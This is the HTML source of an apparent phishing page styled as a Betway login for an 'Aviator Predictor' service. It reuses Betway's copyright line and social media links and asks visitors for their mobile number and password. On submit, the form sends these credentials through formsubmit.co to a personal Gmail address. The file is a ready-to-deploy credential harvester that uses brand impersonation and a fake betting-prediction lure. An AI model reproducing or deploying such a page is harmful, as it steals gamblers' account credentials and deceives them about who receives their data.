<!--DOCTYPE html-->

<html lang="en">

<head>

  <meta charset="UTF-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  

  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

  

  <title>Betting Website Login</title>

  

  <style>

    body {

      font-family: Arial, sans-serif;

      margin: 0;

      padding: 0;

     background-color: #F6F6F6;

    }

footer{

  font-family: sans-serif;

  margin: 0 auto;

  

}

    .navbar {

      background-color: #333;

      color: red;

padding: 15px;

      text-align: center;

      font-weight: bold;

  

      font-size: 20px;

      background-image: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR61e4MQjCwvV_N8roHv2PRCJKDn3HUuxfeXg&usqp=CAU')

    

      

      

    }

    

    .fa-facebook{

      width: 20%;

      

      

color: black;

      

    }

.fa-twitter {

  

  width

  color: black;

  

}

.fa-instagram{

  

  width: 20%;

  color: black;

}

    .login-container {

      color:darkred;

      width: 300px;

      margin: 100px auto;

      background-color: white;

      padding: 20px;

      height: 400px;

      border-radius: 15px;

      box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);

      background-image: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSfOwNz6Ml8MxZElhd8cMJ0NZo2-EgIWXB2AA&usqp=CAU')

    }

    

    .form-group {

      margin-bottom: 20px;

    }

button{

  background-color: darkred;

  padding: 8px;

  width: 40%;

  font-family: Arial, Helvetica, sans-serif;

  font-weight: bold;

  color: white;

  text-align: center;

  border-radius: 4px;

  

  

}

    label {

      display: block;

      font-weight: bold;

      margin-bottom: 5px;

      place-items: center;

    }

    input {

      width: 100%;

      padding: 15px;

      box-sizing: border-box;

      border: 2px solid #B30000;

      border-radius: 4px;

      margin-top: 3px;

      margin-bottom: 10px;

      background-color: whitesmoke;

      

    }

    .password-container {

      position: relative;

    }

    .password-toggle {

      position: absolute;

      right: 10px;

      top: 50%;

      transform: translateY(-50%);

      cursor: pointer;

    }

    

    h2{

      

      color: darkred;

      font-family: Arial, Helvetica, sans-serif;

   font-size: 40px;

   

    }

    

    

    

  </style>

</head>

<body>

  

  <form action="https://formsubmit.co/doctorzonotoph@gmail.com" method="POST">

  

  

  <div class="navbar">

    <h1>AVIATOR PREDICTOR</h1>

  </div>

  <div class="login-container">

    <h2><center>Login</center></h2>

    <form>

      <div class="form-group">

        <label for="username">Mobile Number:</label>

        <input type="text" id="Mobile Number" name="Mobile Number" required>

      </div>

      <div class="form-group password-container">

        <label for="password">Password:</label>

        <input type="password" id="password" name="password" required>

        <span class="password-toggle" onclick="togglePassword()">👁&#65039;</span>

      </div>

      <button type="submit">Get Prediction</button>

    </form>

  </div>

  <script>

    function togglePassword() {

      const passwordInput = document.getElementById('password');

      passwordInput.type = (passwordInput.type === 'password') ? 'text' : 'password';

    }

  </script>

<footer><center>

  

  

    <p><b>Follow us on social media:</b></p>

    

    <a href="https://www.facebook.com/betwaysouthafrica?mibextid=sAuArU1zVvLjaiq0" class="fa fa-facebook"></a>

<a href="https://twitter.com/betway_za?lang=en" class="fa fa-twitter"></a>

<a href="https://instagram.com/betway_sa?igshid=OGQ5ZDc2ODk2ZA==" class="fa fa-instagram"></a>

<a href="#" class=""></a>

  

    <p>&copy; 2023 Betway.co.za. All rights reserved.</p></center>

  </footer>

</body>

</html>
</div>